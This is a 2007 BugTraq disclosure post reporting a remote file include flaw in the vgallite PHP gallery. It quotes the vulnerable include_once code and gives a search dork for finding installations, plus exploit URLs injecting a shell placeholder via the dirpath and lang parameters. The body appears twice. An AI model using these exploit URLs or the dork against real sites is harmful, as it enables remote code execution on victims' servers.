BugTraq
Back to list
|
Post reply
ALL vgallite Remote File Include
Aug 04 2007 04:00PM
RaeD BsdMail Com
Discovred By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Jonathan , Muts
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File:
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".((isset($language))?$language:"english").".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Jonathan , Muts
----------------------------
Script: ALL vgallite
----------------------------
Dork: "vgallite"
----------------------------
B.File:
_functions.php
index.php
----------------------------
Vuln code: if(ereg($key,$filename)) include_once("$dirpath/$filename");
Vuln code: include_once("lang/".((isset($language))?$language:"english").".php");
----------------------------
Exploit:
Http://www.Victim.com/vgallite/_functions.php?dirpath=[Shell-Attack]
Http://www.Victim.com/vgallite/index.php?lang=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
[ reply ]